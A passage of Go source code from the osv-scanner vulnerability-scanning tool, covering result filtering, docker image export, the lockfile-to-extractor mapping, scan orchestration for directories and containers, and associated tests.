"unknown", // Is Maven with package name unknown imodels.Ecosystem(psr).GetValidity() != nil && !imodels.Ecosystem(psr).IsEmpty(): // Is invalid and not empty if actions.ShowAllPackages { filteredPsr = append(filteredPsr, psr) } continue } packageResults = append(packageResults, psr) } if len(packageResults) != len(scanResults.PackageScanResults) { cmdlogger.Infof("Filtered %d local/unscannable package/s from the scan.", len(scanResults.PackageScanResults)-len(packageResults)) } scanResults.PackageScanResults = packageResults return filteredPsr } // filterNonContainerRelevantPackages removes packages that are not relevant when doing container scanning func filterNonContainerRelevantPackages(scanResults *results.ScanResults) { packageResults := make([]*extractor.Package, 0, len(scanResults.PackageScanResults)) for _, psr := range scanResults.PackageScanResults { // Almost all packages with linux as a SourceName are kernel packages // which does not apply within a container, as containers use the host's kernel if imodels.Name(psr) == "linux" { continue } packageResults = append(packageResults, psr) } if len(packageResults) != len(scanResults.PackageScanResults) { cmdlogger.Infof("Filtered %d non container relevant package/s from the scan.", len(scanResults.PackageScanResults)-len(packageResults)) } scanResults.PackageScanResults = packageResults } // filterIgnoredPackages removes ignore scanned packages according to config. Returns filtered scanned packages. func filterIgnoredPackages(scanResults *results.ScanResults) { configManager := &scanResults.ConfigManager out := make([]*extractor.Package, 0, len(scanResults.PackageScanResults)) for _, psr := range scanResults.PackageScanResults { configToUse := configManager.Get(imodels.Location(psr)) if ignore, ignoreLine := configToUse.ShouldIgnorePackage(psr); ignore { pkgString := fmt.Sprintf("%s/%s/%s", imodels.Ecosystem(psr).String(), imodels.Name(psr), imodels.Version(psr)) reason := ignoreLine.Reason if reason == "" { reason = "(no reason given)" } cmdlogger.Infof("Package %s has been filtered out because: %s", pkgString, reason) continue } out = append(out, psr) } if len(out) != len(scanResults.PackageScanResults) { cmdlogger.Infof("Filtered %d ignored package/s from the scan.", len(scanResults.PackageScanResults)-len(out)) } scanResults.PackageScanResults = out } // Filters results according to config, preserving order. Returns total number of vulnerabilities removed. func filterResults(vulnResults *models.VulnerabilityResults, configManager *config.Manager, allPackages bool) int { removedCount := 0 newResults := []models.PackageSource{} // Want 0 vulnerabilities to show in JSON as an empty list, not null. for _, pkgSrc := range vulnResults.Results { configToUse := configManager.Get(pkgSrc.Source.Path) var newPackages []models.PackageVulns for _, pkgVulns := range pkgSrc.Packages { newVulns := filterPackageVulns(pkgVulns, configToUse) removedCount += len(pkgVulns.Vulnerabilities) - len(newVulns.Vulnerabilities) if allPackages || len(newVulns.Vulnerabilities) > 0 || len(pkgVulns.LicenseViolations) > 0 || pkgVulns.Package.Deprecated { newPackages = append(newPackages, newVulns) } } // Don't want to include the package source at all if there are no vulns. if len(newPackages) > 0 { pkgSrc.Packages = newPackages newResults = append(newResults, pkgSrc) } } vulnResults.Results = newResults return removedCount } // Filters package-grouped vulnerabilities according to config, preserving ordering. Returns filtered package vulnerabilities. func filterPackageVulns(pkgVulns models.PackageVulns, configToUse config.Config) models.PackageVulns { ignoredVulns := map[string]struct{}{} // Iterate over groups first to remove all aliases of ignored vulnerabilities. var newGroups []models.GroupInfo for _, group := range pkgVulns.Groups { ignore := false for _, id := range group.Aliases { var ignoreLine *config.IgnoreEntry if ignore, ignoreLine = configToUse.ShouldIgnore(id); ignore { for _, id := range group.Aliases { ignoredVulns[id] = struct{}{} } reason := ignoreLine.Reason if reason == "" { reason = "(no reason given)" } // NB: This only prints the first reason encountered in all the aliases. switch len(group.Aliases) { case 1: cmdlogger.Infof("%s has been filtered out because: %s", ignoreLine.ID, reason) case 2: cmdlogger.Infof("%s and 1 alias have been filtered out because: %s", ignoreLine.ID, reason) default: cmdlogger.Infof("%s and %d aliases have been filtered out because: %s", ignoreLine.ID, len(group.Aliases)-1, reason) } ignoreLine.MarkAsUsed() break } } if !ignore { newGroups = append(newGroups, group) } } var newVulns []*osvschema.Vulnerability if len(newGroups) > 0 { // If there are no groups left then there would be no vulnerabilities. for _, vuln := range pkgVulns.Vulnerabilities { if _, filtered := ignoredVulns[vuln.GetId()]; !filtered { newVulns = append(newVulns, vuln) } } } // Passed by value. We don't want to alter the original PackageVulns. pkgVulns.Groups = newGroups pkgVulns.Vulnerabilities = newVulns return pkgVulns } ================================================ FILE: pkg/osvscanner/filter_internal_test.go ================================================ package osvscanner import ( "path/filepath" "testing" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" ) func Test_filterResults(t *testing.T) { t.Parallel() tests := []struct { name string path string want int }{ { name: "filter_everything", path: "testdata/filter/all", want: 15, }, { name: "filter_nothing", path: "testdata/filter/none", want: 0, }, { name: "filter_partially", path: "testdata/filter/some", want: 10, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() // configManager looks for osv-scanner.toml in the source path. // Sources in the test input should point to files/folders in the testdata folder for this to work correctly. configManager := config.Manager{ DefaultConfig: config.Config{}, ConfigMap: make(map[string]config.Config), } got := testutility.LoadJSONFixture[models.VulnerabilityResults](t, filepath.Join(tt.path, "input.json")) filtered := filterResults(&got, &configManager, false) testutility.NewSnapshot().MatchJSON(t, got) if filtered != tt.want { t.Errorf("filterResults() = %v, want %v", filtered, tt.want) } }) } } ================================================ FILE: pkg/osvscanner/internal/imagehelpers/imagehelpers.go ================================================ // Package imagehelpers provides helper functions for working with container images. package imagehelpers import ( "bufio" "context" "errors" "fmt" "os" "os/exec" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/pkg/models" "github.com/opencontainers/go-digest" ) func BuildImageMetadata(scanResults *results.ScanResults) *models.ImageMetadata { if scanResults.ImageMetadata == nil { return nil } layerMetadata := make([]models.LayerMetadata, 0, len(scanResults.ImageMetadata.GetLayerMetadata())) for _, cl := range scanResults.ImageMetadata.GetLayerMetadata() { layerMetadata = append(layerMetadata, models.LayerMetadata{ DiffID: digest.Digest(cl.GetDiffId()), Command: cl.GetCommand(), IsEmpty: cl.GetIsEmpty(), BaseImageIndex: int(cl.GetBaseImageIndex()), }) } baseImages := make([][]models.BaseImageDetails, 0, len(scanResults.ImageMetadata.GetBaseImageChains())) for _, chain := range scanResults.ImageMetadata.GetBaseImageChains() { baseImageChain := make([]models.BaseImageDetails, 0, len(chain.GetBaseImages())) for _, imgs := range chain.GetBaseImages() { baseImageChain = append(baseImageChain, models.BaseImageDetails{ Name: imgs.GetRepository(), }) } baseImages = append(baseImages, baseImageChain) } imgMetadata := models.ImageMetadata{ OS: scanResults.ImageMetadata.GetOsInfo()["PRETTY_NAME"], LayerMetadata: layerMetadata, BaseImages: baseImages, } return &imgMetadata } // ExportDockerImage will execute the docker binary to export an image to a temporary file in the tarball OCI format. // // If ExportDockerImage does not error, the temporary file needs to be cleaned up by the caller, otherwise, it will be // cleaned automatically by this function. // // ExportDockerImage will first try to locate the image locally, and if not found, attempt to pull the image from the docker registry. func ExportDockerImage(ctx context.Context, dockerImageName string) (string, error) { tempImageFile, err := os.CreateTemp("", "docker-image-*.tar") if err != nil { cmdlogger.Errorf("Failed to create temporary file: %s", err) return "", err } err = tempImageFile.Close() if err != nil { _ = os.RemoveAll(tempImageFile.Name()) return "", err } // Check if image exists locally, if not, pull from the cloud. cmdlogger.Infof("Checking if docker image (%q) exists locally...", dockerImageName) // TODO: Pass through context here. cmd := exec.CommandContext(ctx, "docker", "images", "-q", dockerImageName) output, err := cmd.Output() if err != nil || string(output) == "" { cmdlogger.Infof("Image not found locally, pulling docker image (%q)...", dockerImageName) err = runCommandLogError(ctx, "docker", "pull", "-q", dockerImageName) if err != nil { _ = os.RemoveAll(tempImageFile.Name()) return "", fmt.Errorf("failed to pull container image: %w", err) } } cmdlogger.Infof("Saving docker image (%q) to temporary file...", dockerImageName) err = runCommandLogError(ctx, "docker", "save", "-o", tempImageFile.Name(), dockerImageName) if err != nil { _ = os.RemoveAll(tempImageFile.Name()) return "", err } return tempImageFile.Name(), nil } func runCommandLogError(ctx context.Context, name string, args ...string) error { cmd := exec.CommandContext(ctx, name, args...) // Get stderr for debugging when docker fails stderr, err := cmd.StderrPipe() if err != nil { cmdlogger.Errorf("Failed to get stderr: %s", err) return err } err = cmd.Start() if err != nil { cmdlogger.Errorf("Failed to run docker command (%q): %s", cmd.String(), err) return err } // This has to be captured before cmd.Wait() is called, as cmd.Wait() closes the stderr pipe. var stderrLines []string scanner := bufio.NewScanner(stderr) for scanner.Scan() { stderrLines = append(stderrLines, scanner.Text()) } err = cmd.Wait() if err != nil { cmdlogger.Errorf("Docker command exited with code (%q): %d\nSTDERR:", cmd.String(), cmd.ProcessState.ExitCode()) for _, line := range stderrLines { cmdlogger.Errorf("> %s", line) } return errors.New("failed to run docker command") } return nil } ================================================ FILE: pkg/osvscanner/internal/scanners/lockfile.go ================================================ // Package scanners provides functionality for scanning lockfiles. package scanners import ( "errors" "fmt" "path/filepath" "runtime" "slices" "strings" "github.com/google/osv-scalibr/extractor/filesystem" "github.com/google/osv-scalibr/extractor/filesystem/language/cpp/conanlock" "github.com/google/osv-scalibr/extractor/filesystem/language/dart/pubspec" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/depsjson" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packagesconfig" "github.com/google/osv-scalibr/extractor/filesystem/language/dotnet/packageslockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/erlang/mixlock" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/cabal" "github.com/google/osv-scalibr/extractor/filesystem/language/haskell/stacklock" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradlelockfile" "github.com/google/osv-scalibr/extractor/filesystem/language/java/gradleverificationmetadataxml" "github.com/google/osv-scalibr/extractor/filesystem/language/java/pomxml" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/bunlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/packagelockjson" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/pnpmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/javascript/yarnlock" "github.com/google/osv-scalibr/extractor/filesystem/language/php/composerlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pdmlock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pipfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/poetrylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/pylock" "github.com/google/osv-scalibr/extractor/filesystem/language/python/requirements" "github.com/google/osv-scalibr/extractor/filesystem/language/python/uvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/r/renvlock" "github.com/google/osv-scalibr/extractor/filesystem/language/ruby/gemfilelock" "github.com/google/osv-scalibr/extractor/filesystem/language/rust/cargolock" "github.com/google/osv-scalibr/extractor/filesystem/os/apk" "github.com/google/osv-scalibr/extractor/filesystem/os/dpkg" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scanner/v2/internal/scalibrextract/language/osv/osvscannerjson" ) // OSV-Scanner and OSV-Scalibr has different plugin/override naming conventions. var osvscannerScalibrExtractionMapping = map[string][]string{ "apk-installed": {apk.Name}, "dpkg-status": {dpkg.Name}, "pubspec.lock": {pubspec.Name}, "pnpm-lock.yaml": {pnpmlock.Name}, "yarn.lock": {yarnlock.Name}, "package-lock.json": {packagelockjson.Name}, "pom.xml": {pomxml.Name}, "buildscript-gradle.lockfile": {gradlelockfile.Name}, "gradle.lockfile": {gradlelockfile.Name}, "verification-metadata.xml": {gradleverificationmetadataxml.Name}, "poetry.lock": {poetrylock.Name}, "Pipfile.lock": {pipfilelock.Name}, "pdm.lock": {pdmlock.Name}, "pylock.toml": {pylock.Name}, "requirements.txt": {requirements.Name}, "uv.lock": {uvlock.Name}, "Cargo.lock": {cargolock.Name}, "composer.lock": {composerlock.Name}, "mix.lock": {mixlock.Name}, "renv.lock": {renvlock.Name}, "deps.json": {depsjson.Name}, "packages.config": {packagesconfig.Name}, "packages.lock.json": {packageslockjson.Name}, "conan.lock": {conanlock.Name}, "go.mod": {gomod.Name}, "bun.lock": {bunlock.Name}, "Gemfile.lock": {gemfilelock.Name}, "gems.locked": {gemfilelock.Name}, "cabal.project.freeze": {cabal.Name}, "stack.yaml.lock": {stacklock.Name}, // "Package.resolved": {packageresolved.Name}, } // ParseLockfilePath returns (parseAs, path) func ParseLockfilePath(scanArg string) (string, string) { if runtime.GOOS == "windows" && filepath.IsAbs(scanArg) { return "", scanArg } parseAs, path, found := strings.Cut(scanArg, ":") if !found { path = parseAs parseAs = "" } return parseAs, path } // ParseAsToPlugin finds the parseAs extractor in the list of pluginsToUse func ParseAsToPlugin(parseAs string, pluginsToUse []plugin.Plugin) (filesystem.Extractor, error) { switch parseAs { case "": // No specific parseAs specified return nil, errors.New("no parseAs specified") case "osv-scanner": return osvscannerjson.Extractor{}, nil default: // Find and extract with the extractor of parseAs if names, ok := osvscannerScalibrExtractionMapping[parseAs]; ok && len(names) > 0 { i := slices.IndexFunc(pluginsToUse, func(plug plugin.Plugin) bool { _, ok = plug.(filesystem.Extractor) return ok && slices.Contains(names, plug.Name()) }) if i < 0 { return nil, fmt.Errorf("could not determine extractor, requested %s", parseAs) } fsysExtractor, ok := pluginsToUse[i].(filesystem.Extractor) if !ok { return nil, fmt.Errorf("invalid extractor name %s", parseAs) } return fsysExtractor, nil } return nil, fmt.Errorf("could not determine extractor, requested %s", parseAs) } } ================================================ FILE: pkg/osvscanner/invsort.go ================================================ package osvscanner import ( "cmp" "fmt" "github.com/google/osv-scalibr/converter" "github.com/google/osv-scalibr/extractor" ) // InventorySort is a comparator function for Inventories, to be used in // tests with cmp.Diff to disregard the order in which the Inventories // are reported. func inventorySort(a, b *extractor.Package) int { aLoc := a.Location.PathOrEmpty() bLoc := b.Location.PathOrEmpty() var aExtr, bExtr string var aPURL, bPURL string aPURLStruct := converter.ToPURL(a) bPURLStruct := converter.ToPURL(b) if aPURLStruct != nil { aPURL = aPURLStruct.String() } if bPURLStruct != nil { bPURL = bPURLStruct.String() } aSourceCode := fmt.Sprintf("%v", a.SourceCode) bSourceCode := fmt.Sprintf("%v", b.SourceCode) return cmp.Or( cmp.Compare(aLoc, bLoc), cmp.Compare(a.Name, b.Name), cmp.Compare(a.Version, b.Version), cmp.Compare(aSourceCode, bSourceCode), cmp.Compare(aExtr, bExtr), cmp.Compare(aPURL, bPURL), ) } ================================================ FILE: pkg/osvscanner/osvscanner.go ================================================ package osvscanner import ( "context" "errors" "fmt" "log/slog" "maps" "net/http" "os" "slices" "sort" "time" scalibr "github.com/google/osv-scalibr" "github.com/google/osv-scalibr/artifact/image/layerscanning/image" "github.com/google/osv-scalibr/binary/proto" "github.com/google/osv-scalibr/clients/datasource" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory" scalibrlog "github.com/google/osv-scalibr/log" "github.com/google/osv-scalibr/plugin" "github.com/google/osv-scalibr/stats" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/licensematcher" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/osvmatcher" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner/internal/imagehelpers" "github.com/ossf/osv-schema/bindings/go/osvconstants" "osv.dev/bindings/go/osvdev" ) type ScannerActions struct { ExperimentalScannerActions LockfilePaths []string DirectoryPaths []string GitCommits []string Recursive bool IncludeGitRoot bool NoIgnore bool Image string IsImageArchive bool ConfigOverridePath string CallAnalysisStates map[string]bool ShowAllPackages bool ShowAllVulns bool // local databases CompareOffline bool DownloadDatabases bool LocalDBPath string // license scanning ScanLicensesSummary bool ScanLicensesAllowlist []string // Deprecated: in favor of LockfilePaths SBOMPaths []string } type ExperimentalScannerActions struct { ExcludePatterns []string TransitiveScanning TransitiveScanningActions PluginsEnabled []string PluginsDisabled []string PluginsNoDefaults bool // Currently unused. // TODO(another-rex): Use or wrap this StatsCollector stats.Collector HTTPClient *http.Client // Report deprecated packages as findings FlagDeprecatedPackages bool // Allows specifying user agent RequestUserAgent string } type TransitiveScanningActions struct { Disabled bool NativeDataSource bool MavenRegistry string } type ExternalAccessors struct { // Matchers VulnMatcher clientinterfaces.VulnerabilityMatcher LicenseMatcher clientinterfaces.LicenseMatcher // Required for vendored Extractor OSVDevClient *osvdev.OSVClient } // ErrNoPackagesFound for when no packages are found during a scan. var ErrNoPackagesFound = errors.New("no packages found in scan") // ErrVulnerabilitiesFound includes vulnerabilities, license violations, and package deprecation, // however, will not be raised if only uncalled vulnerabilities are found. var ErrVulnerabilitiesFound = errors.New("vulnerabilities found") // ErrAPIFailed describes errors related to querying API endpoints. // TODO(v2): Actually use this error var ErrAPIFailed = errors.New("API query failed") func initializeExternalAccessors(actions ScannerActions) (ExternalAccessors, error) { externalAccessors := ExternalAccessors{} var err error userAgent := "osv-scanner-api" if actions.RequestUserAgent != "" { userAgent = actions.RequestUserAgent } // Offline Mode // ------------ if actions.CompareOffline { // --- Vulnerability Matcher --- externalAccessors.VulnMatcher, err = localmatcher.NewLocalMatcher(actions.LocalDBPath, userAgent, actions.DownloadDatabases) if err != nil { return ExternalAccessors{}, err } return externalAccessors, nil } // Online Mode // ----------- // --- Vulnerability Matcher --- externalAccessors.VulnMatcher = osvmatcher.New(5*time.Minute, userAgent, actions.HTTPClient) // --- License Matcher --- if len(actions.ScanLicensesAllowlist) > 0 || actions.ScanLicensesSummary { depsDevAPIClient, err := datasource.NewCachedInsightsClient(depsdev.DepsdevAPI, userAgent) if err != nil { return ExternalAccessors{}, err } externalAccessors.LicenseMatcher = &licensematcher.DepsDevLicenseMatcher{ Client: depsDevAPIClient, } } // --- OSV.dev Client --- // We create a separate client from VulnMatcher to keep things clean. externalAccessors.OSVDevClient = osvdev.DefaultClient() externalAccessors.OSVDevClient.Config.UserAgent = userAgent return externalAccessors, nil } // DoScan performs the osv scanner action, with optional reporter to output information func DoScan(actions ScannerActions) (models.VulnerabilityResults, error) { // --- Sanity check flags ---- // TODO(v2): Move the logic of the offline flag changing other flags into here from the main.go/scan.go if actions.CompareOffline { if actions.ScanLicensesSummary { return models.VulnerabilityResults{}, errors.New("cannot retrieve licenses locally") } } if !actions.CompareOffline && actions.DownloadDatabases { return models.VulnerabilityResults{}, errors.New("databases can only be downloaded when running in offline mode") } scanResult := results.ScanResults{ ConfigManager: config.Manager{ DefaultConfig: config.Config{}, ConfigMap: make(map[string]config.Config), }, } // --- Setup Config --- if actions.ConfigOverridePath != "" { err := scanResult.ConfigManager.UseOverride(actions.ConfigOverridePath) if err != nil { cmdlogger.Errorf("Failed to read config file: %s", err) return models.VulnerabilityResults{}, err } } // --- Setup Accessors/Clients --- accessors, err := initializeExternalAccessors(actions) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to initialize accessors: %w", err) } // ----- Perform Scanning ----- packagesAndFindings, err := scan(accessors, actions) if err != nil { return models.VulnerabilityResults{}, err } scanResult.PackageScanResults = packagesAndFindings.Packages scanResult.Inventory = *packagesAndFindings // ----- Filtering ----- unscannablePackages := filterUnscannablePackages(&scanResult, actions) filterIgnoredPackages(&scanResult) // ----- Custom Overrides ----- overrideGoVersion(&scanResult) // --- Make Vulnerability Requests --- if accessors.VulnMatcher != nil { err = makeVulnRequestWithMatcher(&scanResult, accessors.VulnMatcher) if err != nil { return models.VulnerabilityResults{}, err } } // --- Make License Requests --- if accessors.LicenseMatcher != nil { err = accessors.LicenseMatcher.MatchLicenses(context.Background(), scanResult.PackageScanResults) if err != nil { return models.VulnerabilityResults{}, err } } if len(unscannablePackages) > 0 { scanResult.PackageScanResults = slices.Concat(scanResult.PackageScanResults, unscannablePackages) } return finalizeScanResult(scanResult, actions) } func DoContainerScan(actions ScannerActions) (models.VulnerabilityResults, error) { scanResult := results.ScanResults{ ConfigManager: config.Manager{ DefaultConfig: config.Config{}, ConfigMap: make(map[string]config.Config), }, } if actions.ConfigOverridePath != "" { err := scanResult.ConfigManager.UseOverride(actions.ConfigOverridePath) if err != nil { cmdlogger.Errorf("Failed to read config file: %s", err) return models.VulnerabilityResults{}, err } } // --- Setup Accessors/Clients --- accessors, err := initializeExternalAccessors(actions) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to initialize accessors: %w", err) } plugins := getPlugins( []string{"artifact"}, accessors, actions, ) // technically having one detector enabled would also be sufficient, but we're // not mentioning them to avoid confusion since they're still in their infancy if countNotEnrichers(plugins) == 0 { return models.VulnerabilityResults{}, errors.New("at least one extractor must be enabled") } // --- Initialize Image To Scan ---' // TODO: Setup context at the start of the run ctx := context.TODO() var img *image.Image if actions.IsImageArchive { cmdlogger.Infof("Scanning local image tarball %q", actions.Image) img, err = image.FromTarball(actions.Image, image.DefaultConfig()) } else if actions.Image != "" { path, exportErr := imagehelpers.ExportDockerImage(ctx, actions.Image) if exportErr != nil { return models.VulnerabilityResults{}, exportErr } defer os.Remove(path) img, err = image.FromTarball(path, image.DefaultConfig()) cmdlogger.Infof("Scanning image %q", actions.Image) } if err != nil { return models.VulnerabilityResults{}, err } defer func() { err := img.CleanUp() if err != nil { cmdlogger.Errorf("Failed to clean up image: %s", err) } }() capabilities := &plugin.Capabilities{ DirectFS: true, RunningSystem: false, Network: plugin.NetworkOnline, OS: plugin.OSLinux, AllowUnsafePlugins: true, } if actions.CompareOffline { capabilities.Network = plugin.NetworkOffline } plugins = plugin.FilterByCapabilities(plugins, capabilities) logUnsafePlugins(plugins) // --- Do Scalibr Scan --- scanner := scalibr.New() scalibrSR, err := scanner.ScanContainer(context.Background(), img, &scalibr.ScanConfig{ Plugins: plugins, Capabilities: capabilities, StoreAbsolutePath: true, ExplicitPlugins: true, }) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to scan container image: %w", err) } if inventoryIsEmpty(scalibrSR.Inventory) { return models.VulnerabilityResults{}, ErrNoPackagesFound } // --- Save Scalibr Scan Results --- scanResult.PackageScanResults = make([]*extractor.Package, len(scalibrSR.Inventory.Packages)) for i, pkgs := range scalibrSR.Inventory.Packages { scanResult.PackageScanResults[i] = pkgs scanResult.PackageScanResults[i].ExploitabilitySignals = pkgs.ExploitabilitySignals } // --- Fill Image Metadata --- pssr, err := proto.ScanResultToProto(scalibrSR) if err != nil { return models.VulnerabilityResults{}, fmt.Errorf("failed to serialize scan results to proto: %w", err) } if len(pssr.GetInventory().GetContainerImageMetadata()) > 0 { scanResult.ImageMetadata = pssr.GetInventory().GetContainerImageMetadata()[0] } else { cmdlogger.Warnf("No container image metadata found in scan results") } scanResult.Inventory = scalibrSR.Inventory // ----- Filtering ----- unscannablePackages := filterUnscannablePackages(&scanResult, actions) filterIgnoredPackages(&scanResult) filterNonContainerRelevantPackages(&scanResult) // --- Make Vulnerability Requests --- if accessors.VulnMatcher != nil { err = makeVulnRequestWithMatcher(&scanResult, accessors.VulnMatcher) if err != nil { return models.VulnerabilityResults{}, err } } // --- Make License Requests --- if accessors.LicenseMatcher != nil { err = accessors.LicenseMatcher.MatchLicenses(context.Background(), scanResult.PackageScanResults) if err != nil { return models.VulnerabilityResults{}, err } } if len(unscannablePackages) > 0 { scanResult.PackageScanResults = slices.Concat(scanResult.PackageScanResults, unscannablePackages) } return finalizeScanResult(scanResult, actions) } func finalizeScanResult(scanResult results.ScanResults, actions ScannerActions) (models.VulnerabilityResults, error) { vulnerabilityResults := buildVulnerabilityResults(actions, &scanResult) if actions.ScanLicensesSummary { vulnerabilityResults.LicenseSummary = buildLicenseSummary(&scanResult) } filtered := filterResults(&vulnerabilityResults, &scanResult.ConfigManager, actions.ShowAllPackages) if filtered > 0 { cmdlogger.Infof( "Filtered %d %s from output", filtered, output.Form(filtered, "vulnerability", "vulnerabilities"), ) } if unusedIgnoredEntries := scanResult.ConfigManager.GetUnusedIgnoreEntries(); len(unusedIgnoredEntries) != 0 { configFiles := slices.Collect(maps.Keys(unusedIgnoredEntries)) slices.Sort(configFiles) for _, configFile := range configFiles { cmdlogger.Warnf("%s has unused ignores:", configFile) for _, iv := range unusedIgnoredEntries[configFile] { cmdlogger.Warnf(" - %s", iv.ID) } } } return vulnerabilityResults, determineReturnErr(vulnerabilityResults, actions.ShowAllVulns) } func buildLicenseSummary(scanResult *results.ScanResults) []models.LicenseCount { var licenseSummary []models.LicenseCount counts := make(map[string]int) for _, pkg := range scanResult.PackageScanResults { for _, l := range pkg.Licenses { counts[l] += 1 } } if len(counts) == 0 { // No packages found. return []models.LicenseCount{} } licenses := slices.AppendSeq(make([]string, 0, len(counts)), maps.Keys(counts)) // Sort the license count in descending count order with the UNKNOWN // license last. sort.Slice(licenses, func(i, j int) bool { if licenses[i] == "UNKNOWN" { return false } if licenses[j] == "UNKNOWN" { return true } if counts[licenses[i]] == counts[licenses[j]] { return licenses[i] < licenses[j] } return counts[licenses[i]] > counts[licenses[j]] }) licenseSummary = make([]models.LicenseCount, len(licenses)) for i, license := range licenses { licenseSummary[i].Name = models.License(license) licenseSummary[i].Count = counts[license] } return licenseSummary } // determineReturnErr determines whether we found a "vulnerability" or not, // and therefore whether we should return a ErrVulnerabilityFound error. func determineReturnErr(vulnResults models.VulnerabilityResults, showAllVulns bool) error { if len(vulnResults.Results) > 0 { var vuln bool onlyUnimportantVuln := true var licenseViolation bool deprecated := false for _, vf := range vulnResults.Flatten() { if vf.Vulnerability != nil && vf.Vulnerability.GetId() != "" { vuln = true // TODO(gongh): rewrite the logic once we support reachability analysis for container scanning. if vf.GroupInfo.IsCalled() && !vf.GroupInfo.IsGroupUnimportant() { onlyUnimportantVuln = false } } if len(vf.LicenseViolations) > 0 { licenseViolation = true } if vf.Deprecated { deprecated = true } } if !vuln && !licenseViolation && !deprecated { return nil } onlyUnimportantVuln = onlyUnimportantVuln && vuln && !licenseViolation && !deprecated // If the user didn't enable showing all vulns and we only found unimportant ones, // we should return without error. if !showAllVulns && onlyUnimportantVuln { // There is no error. return nil } return ErrVulnerabilitiesFound } return nil } // TODO(V2): Add context func makeVulnRequestWithMatcher( scanResults *results.ScanResults, matcher clientinterfaces.VulnerabilityMatcher, ) error { res, err := matcher.MatchVulnerabilities(context.Background(), scanResults.PackageScanResults) if err != nil { cmdlogger.Errorf("error when retrieving vulns: %v", err) if res == nil { return err } } for i, vulns := range res { for _, vuln := range vulns { scanResults.Inventory.PackageVulns = append(scanResults.Inventory.PackageVulns, &inventory.PackageVuln{ Vulnerability: vuln, Package: scanResults.PackageScanResults[i], }) } } return nil } // Overrides Go version using osv-scanner.toml func overrideGoVersion(scanResults *results.ScanResults) { for i, pkg := range scanResults.PackageScanResults { if imodels.Name(pkg) == "stdlib" && imodels.Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo { configToUse := scanResults.ConfigManager.Get(imodels.Location(pkg)) if configToUse.GoVersionOverride != "" { scanResults.PackageScanResults[i].Version = configToUse.GoVersionOverride } continue } } } // SetLogger sets the global slog handler for the cmdlogger. func SetLogger(handler slog.Handler) { baseHandler := cmdlogger.NewOverride(handler) logger := slog.New(baseHandler) cmdlogger.GlobalLogger = logger scalibrlog.SetLogger(&cmdlogger.ScalibrAdapter{Logger: logger}) } // inventoryIsEmpty ignores image metadata when checking if an inventory is empty func inventoryIsEmpty(i inventory.Inventory) bool { if len(i.Packages) != 0 { return false } if len(i.PackageVulns) != 0 { return false } if len(i.GenericFindings) != 0 { return false } if len(i.Secrets) != 0 { return false } return true } ================================================ FILE: pkg/osvscanner/osvscanner_test.go ================================================ package osvscanner_test import ( "bytes" "errors" "log/slog" "testing" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner" ) // TestDoScan_LogHandlerOverride tests that the SetLogger override works correctly // //nolint:paralleltest // No parallel test since slog.SetDefault sets global behavior func TestDoScan_LogHandlerOverride(t *testing.T) { // Restore default slog behavior at the ned of the test defaultHandler := slog.Default() defer func() { slog.SetDefault(defaultHandler) }() actions := osvscanner.ScannerActions{ DirectoryPaths: []string{"../../cmd/osv-scanner/testdata/locks-many/Gemfile.lock"}, } output := bytes.NewBuffer(nil) slog.SetDefault(slog.New(slog.NewTextHandler(output, nil))) _, _ = osvscanner.DoScan(actions) // Test that normally logging is output correctly to the default slog handler. if output.Len() == 0 { t.Errorf("output.Len() = %d, want %d", output.Len(), 0) } // Clear output buffer for next run output.Truncate(0) // Test if output is overridden altOutput := bytes.NewBuffer(nil) osvscanner.SetLogger(slog.NewTextHandler(altOutput, nil)) _, _ = osvscanner.DoScan(actions) // Normal slog output should be empty. if output.Len() != 0 { t.Errorf("output.Len() = %d, want %d", output.Len(), 0) t.Errorf("Got: %s", output.String()) } // altOutput should contain data now instead. if altOutput.Len() == 0 { t.Errorf("altOutput.Len() = %d, want %d", altOutput.Len(), 0) } } func TestDoScan(t *testing.T) { t.Parallel() type args struct { actions osvscanner.ScannerActions } tests := []struct { name string args args want models.VulnerabilityResults wantErr error }{ { name: "Test_curl_git_scanning", args: args{ actions: osvscanner.ScannerActions{ GitCommits: []string{"33dffa3909a67e1b5d22647128ab7eb6e53fd0c7"}, }, }, want: models.VulnerabilityResults{}, wantErr: osvscanner.ErrVulnerabilitiesFound, }, // TODO: Add test cases. } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := osvscanner.DoScan(tt.args.actions) if !errors.Is(err, 